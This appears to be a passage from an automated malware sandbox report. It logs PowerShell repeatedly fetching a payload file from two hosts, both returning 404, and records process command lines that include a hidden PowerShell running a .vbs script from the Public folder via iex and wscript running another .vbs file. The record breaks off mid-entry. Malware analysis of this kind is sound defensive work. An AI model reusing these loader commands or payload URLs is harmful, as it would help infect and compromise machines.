                                                                            2024-12-05 09:40:09 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.949720184.171.244.2314438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:14 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:15 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:15 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:15 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.949721148.251.114.2334438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:20 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:21 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:21 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:21 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:21 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.949722184.171.244.2314438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:26 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:27 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:26 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:27 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.949723148.251.114.2334438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:32 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:33 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:32 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:33 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:33 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.949724184.171.244.2314438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:38 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:38 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:38 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:38 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.949725148.251.114.2334438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:44 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:44 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:44 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:44 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:44 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.949726184.171.244.2314438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:50 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:50 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:50 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:50 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.949727148.251.114.2334438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:55 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:56 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:56 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:56 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:56 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.949728184.171.244.2314438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:41:01 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:02 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:41:02 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:41:02 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.949729148.251.114.2334438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:41:07 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:08 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:41:07 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:41:08 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:41:08 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:04:39:07
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1"
                                                                            Imagebase:0x7ff760310000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:04:39:07
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff70f010000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:04:39:09
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'"
                                                                            Imagebase:0x7ff760310000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:6
                                                                            Start time:04:39:29
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs"
                                                                            Imagebase:0x7ff75f2d0000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:04:39:29
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
